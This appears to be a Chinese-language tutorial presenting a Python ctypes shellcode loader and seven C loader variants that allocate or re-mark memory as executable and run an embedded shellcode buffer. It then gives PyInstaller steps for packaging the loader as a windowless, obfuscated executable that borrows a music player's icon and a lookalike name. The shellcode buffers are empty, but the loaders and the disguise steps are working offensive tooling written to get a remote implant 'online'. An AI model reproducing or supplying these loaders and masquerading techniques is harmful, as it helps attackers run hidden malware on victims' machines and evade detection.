shellcode basic loader
shellcode basic loader
Python
直接用python运行即可上线
import ctypes
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
RtlMoveMemory = ctypes.windll.kernel32.RtlMoveMemory
CreateThread = ctypes.windll.kernel32.CreateThread
WaitForSingleObject = ctypes.windll.kernel32.WaitForSingleObject
buf = b""
sc = bytearray(buf)
VirtualAlloc.restype = ctypes.c_uint64
k = VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(sc)), 0x1000 | 0x2000, 0x40) #申请内存
buf = (ctypes.c_char * len(sc)).from_buffer(sc) #将sc指向指针
RtlMoveMemory(ctypes.c_void_p(k), buf, ctypes.c_int(len(sc))) #复制sc进申请的内存中
h = CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_void_p(k),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(0))
WaitForSingleObject(ctypes.c_int(h), ctypes.c_int(-1))
那么怎么把py脚本打包成exe呢?先安装一个pyinstaller
pip3 install pyinstaller==5.8.0
pyinstaller -F -w .\main.py -i "C:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe" -n cloadmusic --clean --key fuckqwer
-F 打包成单个exe文件
-w 不显示黑窗口
-i 指定图标,可以偷别的exe程序的
-n 指定打包好的文件名
--clean 清理上一次打包的文件,清除旧的中间构建文件,保证干净
--key xxxxx 混淆代码功能(需要pip install tinyaes)
不知道为啥,在win7的环境下运行的时候报错了,在win11下运行脚本和打包运行两种方式都是可以上线的
C申请内存
#include <windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char sc[] = "";
void main(){
LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, 0x40);
if (addr == NULL) {
return;
}
memcpy(addr, sc, sizeof(sc));
((void(*)())addr)();
}
C用循环逐字节写入
#include <windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char sc[] = "";
int main() {
SIZE_T sc_size = sizeof(sc);
void* addr = VirtualAlloc(NULL, sc_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!addr) return -1;
for (SIZE_T i = 0; i < sc_size; i++) {
((BYTE*)addr)[i] = sc[i];
}
((void(*)())addr)();
return 0;
}
C修改内存属性
#include <windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char sc[] = "";
void main(){
DWORD oldProtect = 0;
VirtualProtect(sc, sizeof(sc), PAGE_EXECUTE_READWRITE, &oldProtect);
void (*func)() = (void(*)())(void*)sc;
func();
}
C修改data段属性
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")
unsigned char sc[] = "";
void main() {
void (*func)() = (void(*)())(void*)sc;
func();
}
C自定义数据段
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
#pragma data_seg("vdata")
unsigned char sc[] = "";
#pragma data_seg()
#pragma comment(linker,"/SECTION:vdata,RWE")
void main() {
void (*func)() = (void(*)())(void*)sc;
func();
}
C通过堆加载
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char sc[] = "";
void main() {
HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(sc), 0);
char* buffer = (char*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof(sc));
memcpy(buffer, sc, sizeof(sc));
((void(*)()) buffer)();
}
C创建线程运行
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char sc[] = "";
void main() {
LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (addr == NULL) {
return;
}
memcpy(addr, sc, sizeof(sc));
HANDLE hThread = CreateThread(NULL,
NULL,
(LPTHREAD_START_ROUTINE)addr,
NULL,
0,
NULL);
WaitForSingleObject(hThread, -1);
CloseHandle(hThread);
}